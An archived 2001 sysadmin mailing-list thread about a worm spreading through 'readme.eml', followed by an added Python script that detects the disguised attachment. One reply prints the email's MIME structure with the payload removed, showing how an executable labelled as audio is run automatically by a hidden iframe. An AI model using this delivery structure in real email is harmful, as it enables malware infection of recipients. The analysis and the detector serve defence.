> .eml is the file format, if you save an email in Outlook Express.
> Mike
>
> ----- Original Message -----
> From: "Miley, Dan" <[EMAIL PROTECTED]>
> To: "NT System Admin Issues" <[EMAIL PROTECTED]>
> Sent: Tuesday, September 18, 2001 2:10 PM
> Subject: RE: serious network down...readme.eml??
>
>
> > .eml is a sound file type. If there's a sound embedded in a web page, it
> > executes. (At least in IE.)
> >
> > Isn't that special.
> >
> > Dan
> >
> > -----Original Message-----
> > From: Adam Meixler [mailto:[EMAIL PROTECTED]]
> > Sent: Tuesday, September 18, 2001 2:36 PM
> > To: NT System Admin Issues
> > Subject: RE: serious network down...readme.eml??
> >
> >
> > If it's like the one I've seen, it's an HTML mail that gets opened by
> > something like Outlook Express. The HTML mail has an attachment which it
> > calls from an iframe. The attachment is actually the exe which does the
> > infection. Here's the source of the eml, with the EXE (EA4DMGBP9p) taken
> > out:
> >
> > MIME-Version: 1.0
> > Content-Type: multipart/related;
> > type="multipart/alternative";
> > boundary="====_ABC1234567890DEF_===="
> > X-Priority: 3
> > X-MSMail-Priority: Normal
> > X-Unsent: 1
> >
> > --====_ABC1234567890DEF_====
> > Content-Type: multipart/alternative;
> > boundary="====_ABC0987654321DEF_===="
> >
> > --====_ABC0987654321DEF_====
> > Content-Type: text/html;
> > charset="iso-8859-1"
> > Content-Transfer-Encoding: quoted-printable
> >
> >
> > <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
> > <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
> > </iframe>
> > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm<BR>
> > </BODY></HTML>
> > --====_ABC0987654321DEF_====--
> >
> > --====_ABC1234567890DEF_====
> > Content-Type: audio/x-wav;
> > name="readme.exe"
> > Content-Transfer-Encoding: base64
> > Content-ID: <EA4DMGBP9p>
> >
> >
> > --====_ABC1234567890DEF_====
> >
> > -----Original Message-----
> > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
> > Sent: Tuesday, September 18, 2001 1:24 PM
> > To: NT System Admin Issues
> > Subject: RE: serious network down...readme.eml??
> >
> >
> > Stupid Ev Question #327: eml files can be executed?
> >
> > Thanks,
> >
> > Evan
> >
> > -----Original Message-----
> > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
> > Sent: Tuesday, September 18, 2001 1:05 PM
> > To: NT System Admin Issues
> > Subject: RE: serious network down...readme.eml??
> >
> > 1 Unplug servers from network.
> > 2 Use ERD to recover.
> > 3 Send users home.
> > 4 Clean clients.
> >
> > -----Original Message-----
> > From: Terry Manolakos [mailto:[EMAIL PROTECTED]]
> > Sent: Tuesday, September 18, 2001 12:21 PM
> > To: NT System Admin Issues
> > Subject: serious network down...readme.eml??
> >
> > My network is slammed with some unknown virus of some sort.....Both my NT 4.0
> > servers running MS-Exchange 6.5 have about 2300 alien files which were
> > deleted....a "readme.eml" is being executed by all users somehow
> > automatically and it's infecting all my NT domain. I can not Ctrl+Alt+Delete
> > to log into any of the servers.....the display shows "initialization of the
> > dynamic link library C:\WINNT\system32\USER32.dll failed. The process is
> > terminating abnormally" OKaying this results in no effects....all servers
> > have this displayed onscreen. For the ones that have admin already logged
> > in, Services (control panel, settings) can not be accessed! "access to the
> > specified device, path, or file is denied"....it seems this virus has locked
> > onto this element. PDC is running Exchange (I know, never put'em
> > together...but we're still cleaning up after previous SysAdmins here), and
> > this has gone berserk as well, with the same message onscreen.
> > Norton/Symantec doesn't recognize "readme.eml"....who out there can shine a
> > flashlight in this dark mess? Thanks in advance.
> > Terry
> >
>
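
Added example, not part of the thread: a Python check for the structure Adam describes, an attachment with an executable file name declared as audio/x-wav and pulled in by an iframe through a cid: reference. The sample message is constructed from the quoted headers with a placeholder payload; the function name, boundary strings and extension list are assumptions.

```python
import re
from email import message_from_string

# Constructed sample modelled on the quoted headers; payload is a placeholder.
SAMPLE_EML = """\
MIME-Version: 1.0
Content-Type: multipart/related; boundary="OUTER"

--OUTER
Content-Type: multipart/alternative; boundary="INNER"

--INNER
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--INNER--

--OUTER
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

cGxhY2Vob2xkZXI=
--OUTER--
"""

EXECUTABLE_EXT = (".exe", ".com", ".scr", ".pif", ".bat", ".cmd")  # assumed list
CID_REF = re.compile(r"<i?frame[^>]*\bsrc\s*=\s*[\"']?cid:([^\s\"'>]+)", re.I)

def find_disguised_attachments(raw):
    """Flag parts whose declared MIME type hides an executable file name."""
    msg = message_from_string(raw)
    referenced = set()  # Content-IDs that an HTML body loads via (i)frame
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            html = part.get_payload(decode=True).decode("latin-1")
            referenced.update(CID_REF.findall(html))
    findings = []
    for part in msg.walk():
        name = (part.get_filename() or "").lower()  # falls back to name=
        ctype = part.get_content_type()
        if name.endswith(EXECUTABLE_EXT) and not ctype.startswith("application/"):
            cid = (part.get("Content-ID") or "").strip("<>")
            findings.append({"name": name, "declared_type": ctype,
                             "auto_loaded_by_html": cid in referenced})
    return findings
```
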